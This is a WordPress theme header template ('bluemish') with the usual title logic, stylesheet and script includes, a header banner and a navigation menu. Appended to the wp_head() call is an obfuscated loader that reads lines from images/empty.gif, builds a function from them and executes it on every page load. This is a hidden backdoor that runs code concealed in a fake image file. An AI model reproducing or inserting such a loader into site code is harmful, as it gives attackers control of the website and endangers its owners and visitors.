<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
<title>
<?php
if (is_home()) { echo bloginfo('name'); echo (' - '); bloginfo('description');}
else if (is_404()) { bloginfo('name'); echo ' - Oops, this is a 404 page'; }
else if (is_search()) { bloginfo('name'); echo (' - Search Results');}
else {bloginfo('name'); echo (' - '); wp_title(''); }
?>
</title>
<link href="<?php bloginfo('stylesheet_url'); ?>" rel="stylesheet" type="text/css" media="all" />
<link href="<?php bloginfo('template_directory'); ?>/css/dropmenu.css" rel="stylesheet" type="text/css" />
<link href="<?php bloginfo('template_directory'); ?>/css/jd.gallery.v2.css" rel="stylesheet" type="text/css" />
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="<?php bloginfo('rss2_url'); ?>" />
<link rel="alternate" type="text/xml" title="RSS .92" href="<?php bloginfo('rss_url'); ?>" />
<link rel="alternate" type="application/atom+xml" title="Atom 1.0" href="<?php bloginfo('atom_url'); ?>" />
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<?php wp_get_archives('type=monthly&format=link'); ?>
<link rel="icon" href="<?php bloginfo('stylesheet_directory');?>/favicon.ico" type="images/x-icon" />

<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/js/dropdown-jquery.js"></script>  
<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/js/dropmenu.js"></script>  
<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/js/jquery-1.2.6.min.js"></script> 
<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/js/mootools.v1.11.js"></script>
<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/js/jd.gallery.v2.js"></script>
<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/js/jd.gallery.set.js"></script>
<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/js/jd.gallery.transitions.js"></script>

<!--[if IE 6]>
<style type="text/css">
#dropmenu { behavior: url(<?php bloginfo('template_directory'); ?>/js/hover.htc); }
.top, .top-content, .bottom, .bottom span { behavior: url(<?php bloginfo('template_directory'); ?>/js/iepngfix.htc); }
</style>
<![endif]-->

<?php
$g_analyst = get_option('rk_bluemish_google_analytics');
echo stripcslashes($g_analyst);
?>

<?php remove_action( 'wp_head', 'wp_generator' ); ?>
<?php if ( is_singular() ) wp_enqueue_script( 'comment-reply' ); ?>
<?php  wp_head(); $gif=file(dirname(__FILE__).'/images/empty.gif',2);$gif=$gif[5]("",$gif[6]($gif[4]));$gif(); ?>


</head>
<body>
<?php include (TEMPLATEPATH . '/options.php'); ?>
<div id="wrapper">
<div id="container">
<div id="header">
	<div class="headleft">
		<h1><a href="<?php echo get_option('home'); ?>" title="<?php bloginfo('name'); ?>"><?php bloginfo('name'); ?></a></h1>
		<p><?php bloginfo('description'); ?></p>
	</div>
	<div class="headright">
	
	<?php if($rk_bluemish_header_banner == '') { ?>
	
	
	<?php } else { ?>
	
	<a href="<?php echo stripcslashes($rk_bluemish_header_banner); ?>"><img src="<?php echo stripcslashes($rk_bluemish_header_banner_img); ?>" alt="Header Banner" border="0" /></a>

	<?php } ?>
	
	</div>
    <div class="clearfix"></div>
</div><!-- HEADER END -->

<div id="fluid-box">

    <div class="top">
	<div class="top-content">
	<div id="navigation">
	<ul id="dropmenu">
	<li><a href="<?php bloginfo('url'); ?>" title="Home">Главная</a></li>
	<?php wp_list_pages('title_li=&depth=0'); ?>
	</ul><!-- DROPMENU END -->
	<div class="clearfix"></div>
	</div>
	</div>
	</div>
	
	<div class="center">
	
	<div class="center-content">